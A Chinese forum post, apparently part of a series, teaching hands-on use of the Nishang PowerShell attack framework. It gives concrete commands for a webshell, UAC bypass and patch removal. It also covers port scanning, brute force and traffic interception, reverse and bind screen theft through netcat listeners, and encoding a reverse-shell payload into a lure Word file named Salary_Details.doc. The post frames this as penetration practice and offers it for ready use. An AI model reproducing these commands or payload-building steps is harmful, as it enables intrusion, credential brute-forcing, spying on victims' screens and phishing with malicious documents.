51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 1996|回复: 0
打印 上一主题 下一主题

nishang工具进阶实战内容

[复制链接]
  • TA的每日心情
    无聊
    昨天 09:05
  • 签到天数: 1050 天

    连续签到: 1 天

    [LV.10]测试总司令

    跳转到指定楼层
    1#
    发表于 2022-10-21 13:48:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    4.3 webshell
      存放于nishangAntak-WebShell目录下,就是一个ASPX的大马,但是命令行是PowerShell,比单纯的cmd强大很多。功能齐全,日aspx的站必备的东西。

    同样需要账号密码,上传下载,无所不能。
      4.4 提权
      渗透过程中,这里应该是使用最多的地方了。
      4.4.1 尝试本地权限提升
      Enable-DuplicateToken
      这个脚本在我们具有一定权限的时候,可以帮助帮助我们获得系统权限。
      4.4.2 Bypass UAC
      Invoke-PsUACme 看名字就知道是干嘛的了。绕过UAC吗~,Nishang中给出的方法太全面了,GET-HELP来看看帮助信息。


    实例一: 使用Sysprep方法和默认的Payload执行。
      实例二: 使用oobe方法跟默认的payload执行。
      实例三: 使用oobe方法跟自制payload执行。
      这个模块用的是UACME项目的DLL来Bypass UAC。所以,方法对照表。


    这只是官方给的例子,回过头来看一眼上面的参数信息。

    -Payloadpath指定一个payload路径
      -CustomDll64
      指定一个dll文件,后两位代表系统位数。
      -CustomDll32
      尝试本地Bypass UAC:


    4.4.3 删除补丁
      删除补丁,这是我见过最`厉害`的脚本,没有之一。如此骚气!
      Remove-Update


    实例一: 删除全部补丁
      实例二: 删除全部的安全补丁
      实例三: 删除指定的补丁
      这是删除之前的补丁情况。


    尝试删除第一个补丁。

    成功删除了第一个补丁。
      4.5端口扫描,爆破
      4.5.1: 端口扫描
      来详细说明下个个参数
      可以使用 Get-Help Invoke-PortScan -full 查看帮助信息。


    -StartAddress 开始的IP地址
      -EndAddress 结束的IP地址
      -ResolveHost 是否解析主机名
      -ScanPort要不要进行端口扫描
      -Port 要扫描的端口(默认很多,看上图)
      -TimeOut 超时时间
      对我本地局域网进行扫描:
      Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost
      扫描中:


    扫描结束:

    4.5.2 弱口令爆破
      Invoke-BruteForce
      之前先说命令参数。
      -ComputerName 对应服务的计算机名
      -UserList 用户名字典
      -PasswordList 密码字典
      -Service 服务(默认为:SQL)
      -StopOnSuccess 匹配一个后停止
      -Delay 延迟时间


    有了上面的说明,这里看到应该很清楚了。不在做过多的解释。
      4.6 嗅探
      内网嗅探,动静太大了,但是,实在没办法的时候,不得不说,这是一个办法。
      在靶机上执行:Invoke-Interceptor -ProxyServer 192.168.250.172 -ProxyPort 9999
      监听机器上执行:netcat -lvvp 9999





    4.7 屏幕窃取
      Show-TargetScreen
      屏幕窃取,一样正反向通吃
      -IPAddress 后面加IP地址(反向链接需要)
      -Port 加端口
      -Bind 正向连接
      反向链接窃取屏幕
      靶机:Show-TargetScreen -Reverse -IPAddress 192.168.250.172 -Port 3333
      攻击机:netcat -nlvp 3333 | netcat -nlvp 9999
      之后访问攻击机器的9999端口,就可以窃取到屏幕了
      正向连接窃取屏幕
      靶机执行:Show-TargetScreen -Bind -Port 3333
      攻击机执行:netcat -nv 192.168.250.37 3333 | netcat -lnvp 9999
      之后同样,访问本机的9999端口,就能正常访问了。


    4.8 Client
      Nishang可以生成各式各样的客户端。类型大概有这么多类型全都可以生成。选择一种来说,其他的方法都是类似的。


    打开nishangShellsInvoke-PowerShellTcpOneLine.ps1这个文件,复制第三行的内容。可以看到中间有一个TCPClient的参数,这里就是远程连接的地址了。

    更改这个地址和端口即可,之后进入命令行执行
      Invoke-Encode -DataToEncode '你的代码' -IsString -PostScript


    执行完成之后会在当前目录下生成两个文件。一个是encoded.txt 另一个是encodedcommand.txt。之后执行
      Out-Word -PayloadScript .encodedcommand.txt
      就可以在我们当前文件夹下生成一个名为Salary_Details.doc的doc文件。之后使用nc监听就好。说完了操作,回过头来看看命令行参数:
      -Payload 后面直接加payload,但是注意引号的闭合
      -PayloadURL 传入远程的payload进行生成
      -PayloadScript 指定本地的脚本进行生成
      -Arguments 之后加要执行的函数。(payload之中有的函数)
      -OutputFile 输出的文件名
      -WordFileDir 输出的目录地址
      -Recurse 在WordFileDir中递归寻找Word文件
      -RemoveDocx 创建完成后删除掉原始的文件
      5.总结
      看完之后肯定一脸懵逼,这都是啥。这么复杂的语法,没办法,针对PowerShell的工具语法相对而言都比较复杂。而且,并没有讲解nishang的后门模块,个人觉得不是那么好用。还有一些反弹技巧并没有详细介绍,比如说什么DNS反弹,ICMP反弹,WMI反弹。
      有兴趣的朋友可以自行研究,每一款工具针对不同的环境都能给我们带来意想不到的效果。不用归不用,但是到万不得已用的时候,才是最恶心的,艺多不压身嘛~



    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?(注-册)加入51Testing

    x
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏
    回复

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-22 17:15 , Processed in 0.408923 second(s), 24 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表